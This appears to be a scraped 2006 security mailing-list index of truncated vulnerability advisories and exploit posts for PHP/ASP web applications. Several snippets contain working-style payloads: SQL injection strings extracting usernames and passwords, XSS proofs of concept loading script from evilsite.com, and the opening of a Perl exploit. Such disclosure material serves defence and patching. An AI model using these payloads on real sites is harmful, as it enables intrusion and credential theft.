Multiple file include exploits in Xtreme Downloads v.1.0

script type : Xtreme Downloads v.1.0

bug found by : sweet-devil

team : site-down

type : file include

####################################################

exploits :

download.php

http://www.example.com/path/download.php?ro

[ more ]  [ reply ]

Hi,

besides the fact that it is always a good idea to notify vendors which might be affected *in advance* before releasing information like this, it's indeed nothing new.

You can find a more comprehensive review of AV products here:
<http://www.heise.de/security/artikel/52139/2>

This list should

[ more ]  [ reply ]

The patch has been released. Refer to http://www.pcpin.com for information.

[ more ]  [ reply ]

------------------------------------------------------------------

- ASPScriptz Guest Book 2.0 Remote XSS -

-= http://colander.altervista.org/advisory/ASzGB.txt =-

------------------------------------------------------------------

-= ASPScriptz Guest Book 2.0 =-

O

[ more ]  [ reply ]

[KAPDA::#47] - myNewsletter 1.1.2 SQL_Injection

SQL_Injection

-------

KAPDA New advisory

Vulnerable products : myNewsletter <= 1.1.2

Vendor: http://www.aspburst.com/index.asp

Risk: Medium

Vulnerability: SQL_Injection

Date :

--------------------

Found : 2006/06/05

Vendor Contacte

[ more ]  [ reply ]

Title:

[Kil13r-SA-20060606] ESTsoft InternetDISK Arbitary Code Execution Vulnerability

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Remote

Timeline:

2006/04/19 - Discovery

2006/04/19 - Vendor notification

2006/04/20 - Vendor response

2006/04/20 - Vendor patch release

200

[ more ]  [ reply ]

Title:

[Kil13r-SA-20060605] Syworks SafeNET Policy File Vulnerability

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Local

Timeline:

2006/04/18 - Discovery

2006/06/05 - Release

Affected version:

All version of Syworks SafeNET

Not affected version:

In this time, none

[ more ]  [ reply ]

#!/usr/bin/perl

#

# by DarkFig -- www.acid-root.new.fr

#

use LWP::Simple;

if ( !$ARGV[1] ) {

header();

print "\n| Usage: <url> <member_id> ----------------|";

print "\n+------------------------------------------+";

print "\n| Example: http://localhost/dmx/ 1 ------|";

end();

}

sub

[ more ]  [ reply ]

[MajorSecurity #9]HostAdmin <= 3.1 - Remote File Include Vulnerability

------------------------------------------------------------------------
-

Software: HostAdmin

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://dreamco

[ more ]  [ reply ]

The mafia online games www.mafia1930.de, www.mafia1930.com and
www.the-mafia.de operated by e-sport GmbH are popular online
applications with over 400.000 accounts.
Although the basic game is free, many people upgrade to premium
accounts and invest real money to get special features.

An attacker is

[ more ]  [ reply ]

[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

------------------------------------------------------------------------
-

Software: DreamAccount

Version: <=3.1

Type: Remote File Include Vulnerability

Date: June, 3rd 2006

Vendor: dreamcost

Page: http://d

[ more ]  [ reply ]

Title:

[Kil13r-SA-20060520] Microsoft Internet Explorer Crash Vulnerability

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Both

Timeline:

2003/12/28 - Discovery

2006/05/20 - Release

2006/06/05 - Update

Affected version:

Microsoft Internet Explorer 6 SP2 or earlier

Not

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hardened-PHP Project
www.hardened-php.net

-= Security Advisory =-

Advisory: DokuWiki PHP code execution vulnerability in spellchecker
Release Date: 2006/06/05
Last Modified

[ more ]  [ reply ]

# Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

# Author : ajann

### Vulnerability;

$$$ http://[target]/[path]/newscomments.php

Example:

$$ http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0
,username,userpassword,0,0,0,0,0,0,

[ more ]  [ reply ]

# Title : FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit

# Author : ajann

REMOTE USER PASS CHANGE EXPLOİT;

Change: <input type="hidden" name="uid" value="1"> => ID AND action

************************************************************************
***********

[ more ]  [ reply ]

# Title : LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability

# Author : ajann

#Vulnerability;

$$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT

$$$ Example:

http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0
,0,email,0,0,0,0,0

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Trustix Secure Linux Security Advisory #2006-0032

Package names: kernel, postgresql
Summary: Multiple vulnerabilities
Date: 2006-06-05
Affected versi

[ more ]  [ reply ]

Kmita FAQ v1.0

Homepage:

http://www.kmita-faq.com

Effected files:

search.php

index.php

Search.php does not sanatize user input before dynamically genrating it.

Proof of concept:

http://www.example.com/search.php?q=<SCRIPT%20SRC=http://evilsite.com/xs
s.js></SCRIPT>

SQL Injection pr

[ more ]  [ reply ]

LabWiki 1.0

Homepage:

http://www.bioinformatics.org/phplabware/labwiki/index.php

Effected files:

search.php

The search input box does not sanatize user input before dynamically genrating it.

XSS Proof of concept:

"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"

[ more ]  [ reply ]

######################################################

# CyBoards PHP Lite v1.25 (common.PHP) Remote File Inclusion

######################################################

# Credit : SpC-x | The-BeKiR

# Site : http://wWw.SaVSaK.CoM

######################################################

[ more ]  [ reply ]

this would require access to the administrator panel to work, how is
this a vuln?

zeus olimpusklan wrote:
> ########################################################################
###
> #Advisory #2 Title: file Modification in osCommerce
> #
> #
> # Author: 0o_zeus_o0
> # Contact: zeus@diosdelared

[ more ]  [ reply ]

# Milli-Harekat Advisory ( www.milli-harekat.org )

# Rumble <= 1.02 version - Remote File Include Vulnerabilities

# Risk : high

# Class: Remote

# Script : Rumble 1.02 version

# Msn : erne [at] ernealizm [dot] com

# Credits : ERNE

# Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,Blackened,Poizonbox

[ more ]  [ reply ]

# Milli-Harekat Advisory ( www.milli-harekat.org )

# Rumble <= 1.02 version - Remote File Include Vulnerabilities

# Risk : high

# Class: Remote

# Script : Rumble 1.02 version

# Msn : erne [at] ernealizm [dot] com

# Credits : ERNE

# Thanks : Dj_ReMix,The_bekir,SpC-x,Eskobar,Black

[ more ]  [ reply ]

------------------------------------------------------------------------
---

Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities

------------------------------------------------------------------------
---

Discovered By SnIpEr_SA

Author : SnIpEr_SA

Remote : Yes

L

[ more ]  [ reply ]